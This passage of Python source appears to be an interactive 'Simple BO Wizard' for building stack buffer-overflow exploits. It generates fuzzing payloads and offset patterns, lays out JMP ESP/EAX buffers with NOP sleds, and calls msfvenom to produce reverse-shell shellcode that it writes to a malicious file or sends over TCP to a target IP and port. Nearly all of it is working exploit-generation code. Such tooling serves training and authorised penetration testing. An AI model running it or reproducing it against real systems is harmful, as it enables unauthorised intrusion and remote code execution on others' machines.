char_string += b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
char_string += b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
char_string += b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
char_string += b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
char_string += b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
# -----------------------------------------------------------------------------
# Buffer types
# -----------------------------------------------------------------------------
class GenericBuffer:
"""
Basic Buffer sending an A-B-C payload, e.g for testing offsets
"""
def __init__(self):
self.id = 0
self.name = 'generic'
self.selectable = True
self.description = 'Simple A-B-C buffer'
self.select_text = 'None of these'
self.payload_size = buf_length - offset - 4 - len(start_command) - len(end_command)
self.buffer = b''
def get_buffer(self):
self.buffer = start_command
self.buffer += b"A" * offset # Overflow
self.buffer += b"B" * 4 # EIP content
self.buffer += b"C" * (buf_length - len(self.buffer) - len(end_command))
self.buffer += end_command
return self.buffer
def get_input(self):
print_error('Sorry! In this case, the wizard cannot build the right buffer automatically. '
'Please use the raw exploit file and modify it manually according your needs.')
def print_buffer(self):
return """
buffer = {start}
buffer += b'A' * offset
buffer += b'B' * 4
buffer += b'C' * (buf_length - len(buffer) - len({end}))
buffer += {end}
""".format(start=start_command,
end=end_command)
class ESPBuffer:
"""
Buffer which contains the payload after the return address. A JMP ESP command should be used as return address.
"""
def __init__(self):
self.id = 1
self.name = 'esp'
self.selectable = True
self.description = 'Buffer with payload in stack and JMP ESP'
self.select_text = 'The Top of Stack and following memory has been overwritten with Cs (ESP points to Cs)'
self.payload_size = buf_length - len(start_command) - offset - 4 - nop_sled - len(end_command)
self.buffer = b''
def get_buffer(self):
self.buffer = start_command
self.buffer += b"A" * offset
self.buffer += return_address
self.buffer += b'\x90' * nop_sled
self.buffer += payload_code
self.buffer += b"C" * (buf_length - len(self.buffer) - len(end_command))
self.buffer += end_command
if len(self.buffer) > buf_length:
print_warning('The buffer with payload is larger than the originally defined buffer length.\n'
'Check whether the exploit still runs properly.')
return self.buffer
def get_input(self):
print_info('Use the debugger to search for a JMP ESP address (e.g. Immunity Debugger: !mona jmp -r ESP)')
print_warning('Take care that the address does not contain a bad characters (such as 00)')
show_prompt_text('Enter a JMP ESP address:')
user_input = get_input(address_valid)
global return_address
return_address = struct.pack('<L', int(user_input, 16))
def print_buffer(self):
return """
buffer = {start}
buffer += b'A' * offset
buffer += b'{retr}' # Return address
buffer += b'{nop_char}' * {nop} # NOP sled
buffer += b'{payload}'
buffer += b'C' * (buf_length - len(buffer) - len({end})) # Padding
buffer += {end}
""".format(start=start_command,
retr=hex_to_print(return_address),
nop_char=hex_to_print(b'\x90'),
nop=nop_sled,
payload=hex_to_print(payload_code),
end=end_command)
class EAXBuffer:
"""
Buffer which contains the payload before the return address. Should be used if EAX points to first part of buffer.
A JMP EAX command should be used as payload.
"""
def __init__(self):
self.id = 2
self.name = 'eax'
self.selectable = True
self.description = 'Buffer with payload in EAX and JMP EAX'
self.select_text = 'The Top of Stack has not been overwritten; EAX points to As'
self.payload_size = offset - nop_sled - nop_padding
self.buffer = b''
def get_buffer(self):
self.buffer = start_command
self.buffer += b'\x90' * nop_sled
self.buffer += payload_code
self.buffer += b'\x90' * (offset - len(self.buffer))
self.buffer += return_address
self.buffer += b"C" * (buf_length - len(self.buffer) - len(end_command))
self.buffer += end_command
if len(self.buffer) > buf_length:
print_warning('The buffer with payload is larger than the originally defined buffer length. '
'Check whether the exploit still runs properly.')
return self.buffer
def get_input(self):
print_info('Use the debugger to search for a JMP EAX address (e.g. Immunity Debugger: !mona jmp -r EAX)')
print_warning('Take care that the address does not contain a bad characters (such as 00)')
show_prompt_text('Enter a JMP EAX address:')
user_input = get_input(address_valid)
global return_address
return_address = struct.pack('<L', int(user_input, 16))
def print_buffer(self):
return """
buffer = {start}
buffer += b'{nop_char}' * {nop} # NOP
buffer += b'{payload}'
buffer += b'{nop_char}' * (offset - len(buffer)) # Padding
buffer += b'{retr}' # Return address
buffer += b'C' * (buf_length - len(buffer) - len({end}))
buffer += {end}
""".format(start=start_command,
nop_char=hex_to_print(b'\x90'),
nop=nop_sled,
payload=hex_to_print(payload_code),
retr=hex_to_print(return_address),
end=end_command)
class FixedAddressBuffer:
"""
Buffer which contains the payload before the return address. Expects a fixed address which points to payload.
"""
def __init__(self):
self.id = 3
self.name = 'fixed'
self.selectable = True
self.description = 'Buffer with payload before EIP and pointer to fixed address'
self.select_text = 'The Top of Stack has not been overwritten but contains a fixed address which points to As'
self.payload_size = offset - nop_sled - nop_padding
self.buffer = b''
def get_buffer(self):
self.buffer = start_command
self.buffer += b'\x90' * nop_sled
self.buffer += payload_code
self.buffer += b'\x90' * (offset - len(self.buffer))
self.buffer += return_address
self.buffer += b"C" * (buf_length - len(self.buffer) - len(end_command))
self.buffer += end_command
if len(self.buffer) > buf_length:
print_warning('The buffer with payload is larger than the originally defined buffer length. '
'Check whether the exploit still runs properly.')
return self.buffer
def get_input(self):
show_prompt_text('Enter the address shown in the Top of Stack:')
user_input = get_input(address_valid)
global return_address
return_address = struct.pack('<L', int(user_input, 16))
def print_buffer(self):
return """
buffer = {start}
buffer += b'{nop_char}' * {nop} # NOP
buffer += b'{payload}'
buffer += b'{nop_char}' * (offset - len(buffer)) # Padding
buffer += b'{retr}' # Return address
buffer += b'C' * (buf_length - len(buffer) - len({end}))
buffer += {end}
""".format(start=start_command,
nop_char=hex_to_print(b'\x90'),
nop=nop_sled,
payload=hex_to_print(payload_code),
retr=hex_to_print(return_address),
end=end_command)
class PatternBuffer:
"""
Buffer which contains a unique pattern for determining the offset
"""
def __init__(self):
self.id = 4
self.name = 'pattern'
self.selectable = False
self.description = 'Buffer with pattern'
self.buffer = b''
self.pattern = b''
def get_buffer(self, pattern):
self.pattern = pattern
self.buffer = start_command
self.buffer += pattern
self.buffer += end_command
return self.buffer
def print_buffer(self):
return """
buffer = {start}
buffer += {pattern}
buffer += {end}
""".format(start=start_command,
pattern=self.pattern,
end=end_command)
class BadCharCBuffer:
"""
Buffer which contains all ASCII characters after the return address
"""
def __init__(self):
self.id = 5
self.name = 'badcharc'
self.selectable = False
self.description = 'Buffer with bad chars after EIP (in Cs)'
self.select_text = 'Enough space in stack for payload'
self.buffer = b''
def get_buffer(self):
self.buffer = start_command
self.buffer += b"A" * offset
self.buffer += b"B" * 4
self.buffer += char_string
self.buffer += b"C" * (buf_length - len(self.buffer) - len(end_command))
self.buffer += end_command
if len(self.buffer) > buf_length:
print_warning('The buffer with all ascii characters is larger than the originally defined buffer length. '
'Check whether the exploit still runs properly.')
return self.buffer
def print_buffer(self):
return """
buffer = {start}
buffer += b'A' * offset
buffer += b'B' * 4
buffer += b'{chars}'
buffer += b'C' * (buf_length - len(buffer) - len({end}))
buffer += {end}
""".format(start=start_command,
chars=hex_to_print(char_string),
end=end_command)
class BadCharABuffer:
"""
Buffer which contains all ASCII characters before the return address
"""
def __init__(self):
self.id = 6
self.name = 'badchara'
self.selectable = False
self.description = 'Buffer with bad chars before EIP (in As)'
self.select_text = 'Not enough space in stack for payload'
self.buffer = b""
def get_buffer(self):
self.buffer = start_command
self.buffer += b"A" * nop_sled
self.buffer += char_string
self.buffer += b"A" * (offset - len(self.buffer))
self.buffer += b"B" * 4
self.buffer += b"C" * (buf_length - len(self.buffer) - len(end_command))
self.buffer += end_command
if len(self.buffer) > buf_length:
print_warning('The buffer with all ascii characters is greater than the originally defined buffer length. '
'Check whether the exploit still runs properly.')
return self.buffer
def print_buffer(self):
return """
buffer = {start}
buffer += b'A' * {nop}
buffer += b'{chars}'
buffer += b'A' * (offset - len(buffer))
buffer += b'B' * 4
buffer += b'C' * (buf_length - len(buffer) - len({end}))
buffer += {end}
""".format(start=start_command,
nop=nop_sled,
chars=hex_to_print(char_string),
end=end_command)
class BufferTypes:
    """
    Registry of all available buffer layouts, queryable by name or id.
    """

    def __init__(self):
        # One instance of every known layout; order is irrelevant.
        self.buf_types = [
            GenericBuffer(),
            ESPBuffer(),
            EAXBuffer(),
            FixedAddressBuffer(),
            PatternBuffer(),
            BadCharCBuffer(),
            BadCharABuffer()
        ]
        self.selected_buffer = None

    def get_buffer_by_name(self, name):
        """Return (and remember as selected) the layout whose name matches."""
        for candidate in self.buf_types:
            if candidate.name == name:
                self.selected_buffer = candidate
                return candidate

    def get_buffer_by_id(self, buf_id):
        """Return (and remember as selected) the layout whose id matches."""
        for candidate in self.buf_types:
            if candidate.id == buf_id:
                self.selected_buffer = candidate
                return candidate

    def get_selectable_buffers(self):
        """Return only the layouts offered in the interactive menu."""
        return [candidate for candidate in self.buf_types if candidate.selectable]
def hex_to_print(hex_string):
    """Render a bytes value as a printable ``\\xNN``-escaped string.

    :param hex_string: (bytes) raw bytes, e.g. ``b'\\x90\\x0a'``
    :return: (str) e.g. ``'\\x90\\x0a'`` (lowercase hex); '' for empty input

    Replaces the original double call to ``hex_string.hex()`` plus a
    zip-of-offset-slices pairing trick with one direct pass over the bytes.
    """
    # Iterating bytes yields ints; %02x matches bytes.hex()'s lowercase pairs.
    return "".join("\\x%02x" % byte for byte in hex_string)
# Init buffer list
buffer_list = BufferTypes()
# -----------------------------------------------------------------------------
# Descriptions of all parameters
# -----------------------------------------------------------------------------
# Returns lists with: parameter name, value, required, description
def desc_bo_type():
return ['type', bo_type, 'yes',
'Type of buffer overflow: local or remote']
def desc_step():
return ['step', current_step, 'yes',
'Currently selected wizard step']
def desc_file():
global file
file = file_name + '.' + file_ext if file_ext else file_name
return ['file', file, 'yes',
'File name; to change set the filename and file_ext parameters']
def desc_file_name():
    """Describe the 'filename' setting; required only for local BOs."""
    # Fix: `bo_type is 'local'` compared string *identity* (CPython interning
    # accident, SyntaxWarning on 3.8+); equality is the correct test.
    return ['filename', file_name, 'yes' if bo_type == 'local' else 'no',
            'Name of exploit file']
def desc_file_ext():
    """Describe the 'fileext' setting; required only for local BOs."""
    # Fix: string comparison must use ==, not identity (`is`).
    return ['fileext', file_ext, 'yes' if bo_type == 'local' else 'no',
            'Extension of exploit file']
def desc_target():
    """Describe the 'target' setting; required only for remote BOs."""
    # Fix: string comparison must use ==, not identity (`is`).
    return ['target', target, 'yes' if bo_type == 'remote' else 'no',
            'IP of target system']
def desc_port():
    """Describe the 'port' setting; required only for remote BOs."""
    # Fix: string comparison must use ==, not identity (`is`).
    return ['port', port, 'yes' if bo_type == 'remote' else 'no',
            'Port on which application runs of target system']
def desc_start_command():
return ['command', str(start_command), 'no',
'Command which needs to be placed before calling the payload. '
'Enter with: set command "command". For raw ASCII input use: set command b"command". '
'Leave empty if not required']
def desc_end_command():
return ['end_command', str(end_command), 'no',
'Command which needs to be placed after calling the payload. '
'Enter with: set end_command "command". For raw ASCII input use: set command b"command". '
'Leave empty if not required']
def desc_fuzz_buff_length():
return ['fuzz_length', fuzz_buff_length, 'yes',
'How many payloads with increasing length will be created for fuzzing']
def desc_increase_step():
return ['fuzz_increase', increase_step, 'yes',
'How much the payload will be increased on each step']
def desc_fuzz_char():
return ['fuzz_char', fuzz_char.decode(), 'yes',
'Which character will be used for fuzzing the buffer']
def desc_pattern():
return ['pattern', pattern_length, 'yes',
'Length of alphanumeric pattern which will be generated.']
def desc_buf_length():
return ['buffer_length', buf_length, 'yes',
'Total length of buffer']
def desc_offset():
return ['offset', offset, 'yes',
'Offset for EIP overwrite']
def desc_badchars():
return ['badchars', ', '.join(c for c in badchars), 'yes',
'Which characters are not allowed in the buffer']
def desc_nop_sled():
return ['nop_sled', nop_sled, 'yes',
'Size of NOP sled before payload']
def desc_nop_padding():
return ['nop_padding', nop_padding, 'yes',
'Size of NOP padding after payload']
def desc_return_address():
return ['return', format(struct.unpack('<L', return_address)[0], 'x'), 'yes',
'Memory address to return to (e.g. JMP ESP address)']
def desc_arch():
return ['arch', arch, 'yes',
'Architecture of target system: 86 or 64']
def desc_platform():
return ['platform', platform, 'yes',
'Operating system or platform of target']
def desc_payload():
return ['payload', payload, 'yes',
'Type of payload. See msfvenom for possible options: msfvenom -l payloads']
def desc_connect_ip():
    """Describe the 'lhost' setting; required only for remote BOs."""
    # Fix: string comparison must use ==, not identity (`is`).
    return ['lhost', connect_ip, 'yes' if bo_type == 'remote' else 'no',
            'IP to connect to, e.g. with reverse shell']
def desc_connect_port():
    """Describe the 'lport' setting; required only for remote BOs."""
    # Fix: string comparison must use ==, not identity (`is`).
    return ['lport', connect_port, 'yes' if bo_type == 'remote' else 'no',
            'Port to connect to, e.g. with reverse shell']
# -----------------------------------------------------------------------------
# Start
# -----------------------------------------------------------------------------
def check_dependencies():
    """
    Checks if all required binaries are available
    :return: (boolean) True if all dependencies fulfilled
    """
    required = ['msf-pattern_create', 'msf-pattern_offset', 'msfvenom']
    missing = []
    for binary in required:
        try:
            # A failed spawn (OSError) means the binary is not on PATH.
            sub.call(binary, stdout=sub.DEVNULL, stderr=sub.DEVNULL)
        except OSError:
            missing.append(binary)
            print_error('Missing binary: {}'.format(binary))
    if missing:
        print_info('You need to install the Metasploit Framework')
    return not missing
def print_welcome():
"""
Prints a welcome message to the screen
"""
print('''{}
╔═╗┬┌┬┐┌─┐┬ ┌─┐
╚═╗││││├─┘│ ├┤
╚═╝┴┴ ┴┴ ┴─┘└─┘
▄▄▄▄ ▒█████
▓█████▄ ▒██▒ ██▒
▒██▒ ▄██▒██░ ██▒
▒██░█▀ ▒██ ██░
░▓█ ▀█▓░ ████▓▒░
░▒▓███▀▒░ ▒░▒░▒░
▒░▒ ░ ░ ▒ ▒░
░ ░ ░ ░ ░ ▒ *
░ ░ ░ *°
*°`
╦ ╦┬┌─┐┌─┐┬─┐┌┬┐ *°``
║║║│┌─┘├─┤├┬┘ ││ (´***°``)
╚╩╝┴└─┘┴ ┴┴└──┴┘ ```*´´´
This wizards helps you getting
started with simple buffer overflows.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~{}
'''.format(CYAN, FORMAT_END))
def select_bo_type():
    """
    Prints the buffer overflow types to the screen and stores the users selection
    """
    show_prompt_text('Select type of buffer overflow:')
    show_prompt_text('[ L ] Local buffer overflow', False)
    show_prompt_text(' {} = Open a malicious file in an application {}'.format(GRAY, FORMAT_END), False)
    show_prompt_text('[ R ] Remote buffer overflow', False)
    show_prompt_text(' {} = Send a malicious request via TCP to an application {}'.format(GRAY, FORMAT_END), False)
    # Loops until bo_type_valid accepts the answer.
    user_input = get_input(bo_type_valid)
    global bo_type
    # Any of 'l'/'loc'/'local' selects the local workflow; everything else
    # bo_type_valid accepted means remote.
    bo_type = 'local' if user_input in ['l', 'loc', 'local'] else 'remote'
# -----------------------------------------------------------------------------
# Steps
# -----------------------------------------------------------------------------
def start_steps():
    """Starts the wizard steps, beginning with fuzzing"""
    # Each step_* function chains to the next one on completion.
    step_fuzzing()
def step_fuzzing():
"""
We will increasing payloads and send them to the application to find out at which length a buffer overflow occurs
"""
global current_step
current_step = 0
show_step_banner('[0] Fuzzing')
if bo_type == 'local':
# File extension
show_prompt_text('Enter file extension:')
user_input = get_input(ext_valid)
global file_ext
global file
file_ext = user_input
file = file_name + '.' + file_ext if file_ext else file_name
print('\n{} files with increasing size will be generated. The following settings will be used:\n'.format(
fuzz_buff_length))
settings = [desc_file_ext(), desc_fuzz_buff_length(), desc_fuzz_char(), desc_increase_step(),
desc_start_command(), desc_end_command()]
elif bo_type == 'remote':
# Target IP
show_prompt_text('Enter target IP:')
user_input = get_input(ip_valid)
global target
target = user_input
# Target port
show_prompt_text('Enter target port:')
user_input = get_input(port_valid)
global port
port = int(user_input)
print('\nA fuzzing file will be generated. The following settings will be used:\n')
settings = [desc_target(), desc_port(), desc_fuzz_buff_length(), desc_fuzz_char(),
desc_increase_step(), desc_start_command(), desc_end_command()]
# Optional: file name, buffer length, increase, start command
show_settings(settings)
if proceed_ok():
if bo_type == 'local':
dump_local_fuzz()
elif bo_type == 'remote':
dump_remote_fuzz()
run_remote_fuzzing()
# Proceed
step_pattern()
def step_pattern():
"""
Based on the buffer length determined through fuzzing (previous step), we will create and send
a unique pattern which will help us finding the offset
"""
global current_step
current_step = 1
show_step_banner('[1] Finding offset')
# Get length from fuzzing
show_prompt_text('Enter the length at which the application/service crashed:')
user_input = get_input(number_valid)
global pattern_length
pattern_length = int(user_input) - len(start_command) - len(end_command)
global buf_length
buf_length = int(user_input)
# Call Metasploit framework
tmp_file = 'pattern.txt'
command = 'msf-pattern_create -l {} > {}'.format(pattern_length, tmp_file)
thread = call_command(command)
while thread.running():
animation('Creating pattern')
# Proceed if pattern creation was successful
if thread.result() == 0:
print()
# Buffer ----------------------------------
with open(tmp_file, 'r') as f:
pattern = f.read().splitlines()[0].encode()
global buffer
buffer = buffer_list.get_buffer_by_name('pattern').get_buffer(pattern)
# -----------------------------------------
os.unlink(tmp_file)
print('The exploit file will be generated. The following settings will be used:\n')
if bo_type == 'local':
settings = [desc_pattern(), desc_start_command(), desc_end_command()]
show_settings(settings)
if proceed_ok():
dump_local_exploit()
print(' Load file into vulnerable application and check which pattern is shown in EIP on crash.')
elif bo_type == 'remote':
settings = [desc_target(), desc_port(), desc_pattern(), desc_start_command(), desc_end_command()]
show_settings(settings)
if proceed_ok():
dump_remote_exploit()
run_remote_exploit()
# Proceed
step_offsets()
def step_offsets():
    """
    Step [2]: The user enters the value that overwrites EIP.
    By comparing this value to the pattern (previous step), the offset can be determined.
    We will then build a custom payload that places Bs in the EIP.
    The user must then check in the debugger whether the offset has been calculated properly.
    """
    global current_step
    current_step = 2
    show_step_banner('[2] Checking offsets')
    # Get EIP offset from pattern -----------------------------------------------
    show_prompt_text('Enter the 8 characters that are shown in the EIP:')
    user_input = get_input(pattern_valid)
    # Call Metasploit framework (input is shell-quoted via shlex)
    tmp_file = 'offset.txt'
    command = 'msf-pattern_offset -q {} > {}'.format(shlex.quote(user_input), tmp_file)
    thread = call_command(command)
    while thread.running():
        animation('Finding offset')
    # Proceed if finding offset was successful
    if thread.result() == 0:
        print()
        with open(tmp_file, 'r') as f:
            result = f.read()
        try:
            global offset
            # msf-pattern_offset output ends with the numeric offset
            offset = int(result.split(' ')[-1])
            print_info('Offset at ' + str(offset))
        except (ValueError, IndexError):
            # Pattern not found: let the user jump back to an earlier step
            print_error('Could not find string in pattern. Maybe the exploit did not work?')
            print_info('You could return to step [1] and try increasing the length.')
            os.unlink(tmp_file)
            valid_step = False
            while not valid_step:
                show_prompt_text('With which step do you want to proceed?')
                user_input = get_input(number_valid)
                if set_step(user_input):
                    valid_step = True
        os.unlink(tmp_file)
    # Get stack (ESP) offset from pattern ---------------------------------------
    show_prompt_text('Enter the 8 characters that are shown at the top of stack:')
    user_input = get_input(pattern_valid)
    # Call Metasploit framework
    tmp_file = 'offset.txt'
    command = 'msf-pattern_offset -q {} > {}'.format(shlex.quote(user_input), tmp_file)
    thread = call_command(command)
    while thread.running():
        animation('Finding offset')
    # Proceed if finding offset was successful
    if thread.result() == 0:
        print()
        with open(tmp_file, 'r') as f:
            result = f.read()
        try:
            stack_offset = int(result.split(' ')[-1])
            print_info('Offset at ' + str(stack_offset))
            global nop_sled
            # Grow the NOP sled so it at least bridges the EIP->stack distance
            off_stack_dist = stack_offset - offset
            if off_stack_dist > nop_sled:
                nop_sled = off_stack_dist
        except (ValueError, IndexError):
            print_info('Could not find string in pattern. '
                       'Seems that the overflow did not overwrite the stack. We will deal with that later.')
        os.unlink(tmp_file)
    # Create check file: generic buffer puts Bs in EIP (42424242) ---------------
    global buffer
    buffer = buffer_list.get_buffer_by_name('generic').get_buffer()
    if bo_type == 'local':
        dump_local_exploit()
    elif bo_type == 'remote':
        update_remote_exploit()
        run_remote_exploit()
    print(
        ' Does the EIP show 42424242? If not, something is wrong with the offset and you should repeat the previous steps.')
    print_info('Write the address down where the Cs start. You can use it later to find bad characters with mona.')
    # Proceed
    if proceed_ok():
        step_badchars()
def step_badchars():
    """
    Step [3]: An ASCII string is repeatedly passed as payload.
    The user has to examine the result in a debugger and enter the characters that break the exploit.
    These characters are stored and will be considered later when creating the real payload.
    """
    global current_step
    current_step = 3
    show_step_banner('[3] Finding bad characters')
    print_info('You must probably repeat this step multiple times until you have found all bad characters.')
    # Mona info
    print('''{}
In Immunity Debugger, you can use mona to find the bad characters. To do so, do the following before running the exploit:
1. Set up working directory: !mona config -set workingfolder c:\\mona\\%p
2. Create byte array: !mona bytearray
{}'''.format(GRAY, FORMAT_END))
    all_chars_found = False
    # Loop: resend the remaining character set until the user reports no more bad chars
    while not all_chars_found:
        global buffer
        buffer = buffer_list.get_buffer_by_name('badcharc').get_buffer()
        if bo_type == 'local':
            dump_local_exploit()
        elif bo_type == 'remote':
            update_remote_exploit()
            run_remote_exploit()
        print('\n Can you see all Cs when following ESP or EAX in dump (depending on where the Cs are stored)?')
        print('''{}
In Immunity Debugger, you can use mona to find the bad characters.
To do so, do the following before resending the exploit:
1. Compare: !mona compare -f c:\\mona\\<app name>\\bytearray.bin -a <address where Cs should start>
2. Recreate byte array: !mona bytearray -cpb "{}<new_bad_char>"
{}'''.format(GRAY, '\\x' + '\\x'.join(c for c in badchars), FORMAT_END))
        show_prompt_text('Enter the character (e.g. 00, 0a, 0d) which does not show up or breaks the exploit')
        show_prompt_text('To show all possible ascii characters enter {}show ascii{}'.format(BOLD, FORMAT_END))
        show_prompt_text('Leave empty / press Enter when there a no more bad characters.')
        user_input = get_input(bad_char_valid)
        if user_input == '':
            all_chars_found = True
        else:
            # Remove the byte from the test character string ...
            char = unhexlify(user_input)
            global char_string
            char_string = char_string.replace(char, b'')
            # ... and remember its hex form in the list of bad chars
            badchars.append(user_input)
    # Proceed
    step_return()
def step_return():
    """
    Step [4]: By examining the buffer overflow, we can determine where to put the
    payload and which command to use to access it. The user picks one of the
    selectable buffer layouts offered by buffer_list.
    """
    global current_step
    current_step = 4
    show_step_banner('[4] Finding return address')
    show_prompt_text('Examine the buffer overflow in the debugger. Which case does apply?')
    buf_types = buffer_list.get_selectable_buffers()
    for b in buf_types:
        show_prompt_text('[ ' + str(b.id) + ' ] ' + b.select_text, False)
    # Wait for user selection (must be a valid buffer id)
    while True:
        user_input = int(get_input(number_valid))
        if 0 <= user_input < len(buf_types):
            break
        print_warning('The number you entered is invalid')
    # Handle selected buffer type: the buffer object collects its own extra input
    selected = buffer_list.get_buffer_by_id(user_input)
    selected.get_input()
    global buffer
    buffer = selected.get_buffer()
    if bo_type == 'local':
        dump_local_exploit()
    elif bo_type == 'remote':
        update_remote_exploit()
        run_remote_exploit()
    # Proceed
    print(' Check if everything is where it should be. If not, repeat previous steps.')
    if proceed_ok():
        step_payload()
def step_payload():
    """
    Step [5]: Collect the msfvenom settings (LHOST, LPORT, arch, platform,
    payload type), create the final payload and dump/send the exploit.
    Empty input keeps the currently set value for each parameter.
    """
    global current_step
    current_step = 5
    show_step_banner('[5] Creating payload')
    # Set IP -----------------
    global connect_ip
    show_prompt_text('Enter your IP (hit Enter to use current value {}):'.format(connect_ip))
    user_input = get_input(ip_valid)
    if user_input != '':
        connect_ip = user_input
    # Set port -----------------
    global connect_port
    show_prompt_text('Enter the port to listen on (hit Enter to use current value {}):'.format(connect_port))
    user_input = get_input(port_valid)
    if user_input != '':
        connect_port = user_input
    # Set architecture -----------------
    global arch
    show_prompt_text('Enter the target architecture (hit Enter to use current value {}):'.format(arch))
    user_input = get_input(arch_valid)
    if user_input != '':
        # User enters '64'/'86'; stored as msfvenom arch name 'x64'/'x86'
        arch = 'x' + user_input
    # Set platform -----------------
    global platform
    show_prompt_text('Enter the target platform (hit Enter to use current value {}):'.format(platform))
    user_input = get_input(platform_valid)
    if user_input != '':
        platform = user_input
    # Set payload -----------------
    global payload
    while True:
        show_prompt_text('Enter payload type'.format(payload))
        show_prompt_text('Show all available with {}show payloads{}'.format(BOLD, FORMAT_END))
        user_input = get_input(payload_valid)
        if user_input == 'show payloads':
            show_payloads()
            continue
        else:
            # Create payload -----------------
            payload = user_input
            payload_ok = create_payload()
            if payload_ok and bo_type == 'local':
                dump_local_exploit()
            elif payload_ok and bo_type == 'remote':
                update_remote_exploit()
                run_remote_exploit()
            show_prompt_text('Did your exploit work? If not, try sending a different payload.')
            show_prompt_text(
                'Enter {}again{} to try again. Hit Enter if everything worked fine.'.format(BOLD, FORMAT_END))
            user_input = get_input(check_text)
            if user_input == '':
                break
            else:
                continue
    # Finally show prompt till user exits (generic_check never accepts)
    get_input(generic_check)
def create_payload():
    """
    Creates a payload with msfvenom and updates the buffer.

    msfvenom is asked to write a python file defining the variable 'payld',
    which is then imported and spliced into the selected buffer layout.
    :return: True if the payload was created, False on msfvenom failure
    """
    tmp_file = 'payload.py'
    payload_size = buffer_list.selected_buffer.payload_size
    command = "msfvenom -a {arch} --platform {plat} -p {pay} LHOST={host} LPORT={port} EXITFUNC=thread -s {size} -b '{bad}' -f py -v payld -o {file}".format(
        arch=shlex.quote(arch),
        plat=shlex.quote(platform),
        pay=shlex.quote(payload),
        host=connect_ip,
        port=connect_port,
        size=payload_size,
        bad='\\x' + '\\x'.join(str(char) for char in badchars),
        file=tmp_file)
    print_info("Executing command: " + command)
    thread = call_command(command)
    while thread.running():
        animation('Creating payload')
    # Proceed if payload creation was successful
    if thread.result() == 0:
        print()
        # Import the variable msfvenom just wrote into payload.py
        from payload import payld
        global payload_code
        payload_code = payld
        # Remove temporary file and folder
        # os.unlink(tmp_file)
        shutil.rmtree('__pycache__', ignore_errors=True)
        # Update buffer with payload
        global buffer
        buffer = buffer_list.selected_buffer.get_buffer()
        print_info('Buffer has been updated with new payload')
        if len(payload_code) > payload_size:
            print_warning(
                "The payload was generated as small as possible. However, it is larger than the specified payload size.\n"
                "The exploit probably still works fine, but don't be surprised if problems occur.")
        return True
    else:
        print('\n')
        print_warning('Something went wrong when creating the payload. Check if you have entered a valid payload.')
        print_info('To create a new payload use {}set payload <value>{}'.format(BOLD, FORMAT_END))
        return False
# -----------------------------------------------------------------------------
# Input check functions
# -----------------------------------------------------------------------------
# Checks whether the user input is valid in the given context
# Returns True if input is valid
# -----------------------------------------------------------------------------
def intro_valid(user_input):
    """The wizard intro only accepts the literal command 'start'."""
    return user_input == 'start'
def bo_type_valid(user_input):
    """Accepts the common short and long spellings of 'local' / 'remote'."""
    accepted = ('l', 'loc', 'local', 'r', 'rem', 'remote')
    if user_input in accepted:
        return True
    print_error("Invalid buffer overflow type. Only 'local' or 'remote' are possible.")
    return False
def ext_valid(user_input):
    """
    Accepts a file extension: no leading dot, no spaces, at most 20 characters.

    :param user_input: (string) Extension entered by the user
    :return: True if the extension is usable, False otherwise
    """
    # Bug fix: the original printed the error message for *valid* input and
    # rejected invalid input silently. The message belongs on the invalid path.
    if user_input.startswith('.') or len(user_input) > 20 or ' ' in user_input:
        print_error("Invalid input. Enter the extension without preceding dot. Maximum length is 20.")
        return False
    return True
def ip_valid(user_input):
    """Accepts an empty string (keep current value) or a valid IPv4 address."""
    if user_input == '':
        return True
    octet = r'([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])'
    return re.match(r'^(' + octet + r'\.){3}' + octet + r'$', user_input)
def port_valid(user_input):
    """Accepts an empty string (keep current value) or an integer in 0-65535."""
    if user_input == '':
        return True
    try:
        if 0 <= int(user_input) <= 65535:
            return True
    except ValueError:
        pass
    print_error("Invalid port number.")
    return False
def check_enter(user_input):
    """Accepts no input (plain Enter) or the literal 'skip'."""
    return user_input == '' or user_input == 'skip'
def number_valid(user_input):
    """Accepts any string that parses as an integer."""
    try:
        int(user_input)
    except ValueError:
        print_error("Invalid number.")
        return False
    return True
def pattern_valid(user_input):
    """
    Validates a register value read from a Metasploit pattern.

    The msf pattern is alphanumeric, so the 4-byte value shown in EIP/on the
    stack is entered as exactly 8 alphanumeric characters.
    """
    if len(user_input) == 8 and user_input.isalnum():
        return True
    # Fixed message: 'mus be an 8-bit hex value' was a typo and factually
    # wrong - the expected input is 8 alphanumeric characters.
    print_error("Invalid pattern. The pattern must be 8 alphanumeric characters.")
    return False
def bad_char_valid(user_input):
    """Accepts an empty string (= done) or a two-character hex byte such as '0a'."""
    if user_input == '':
        return True
    if len(user_input) != 2 or not user_input.isalnum():
        print_error("Invalid character. Enter the hex value: 00 0a etc.")
        return False
    try:
        int(user_input, 16)
    except ValueError:
        return False
    return True
def address_valid(user_input):
    """
    Accepts a 32-bit memory address entered as exactly 8 hex characters.
    """
    if len(user_input) == 8:
        try:
            int(user_input, 16)
            return True
        except ValueError:
            return False
    # Fixed message: previously claimed '3-bit hex value'; a 32-bit address
    # is entered as 8 hex characters.
    print_error("Invalid memory address. Must be an 8-character (32-bit) hex value.")
    return False
def payload_valid(user_input):
    """Accepts 'platform/payload' style strings, 'show payloads' or empty input."""
    if user_input in ('show payloads', '') or len(user_input.split('/')) >= 2:
        return True
    print_error("Invalid payload. Use 'show payloads' to show valid payloads.")
    return False
def arch_valid(user_input):
    """Accepts '64' or '86' as target architecture, or empty input (keep value)."""
    if user_input in ['64', '86', '']:
        return True
    # Typo fix: 'atchitecture' -> 'architecture'
    print_error("Invalid architecture. Enter 64 or 86.")
    return False
def platform_valid(user_input):
    """Msfvenom platform names are purely alphabetic words of at most 10 characters."""
    if user_input == '' or (user_input.isalpha() and len(user_input) <= 10):
        return True
    print_error("Invalid platform type")
    return False
def check_text(user_input):
    """Accepts empty input or any string without digits or special characters."""
    if user_input == '' or user_input.isalpha():
        return True
    print_error("Invalid input")
    return False
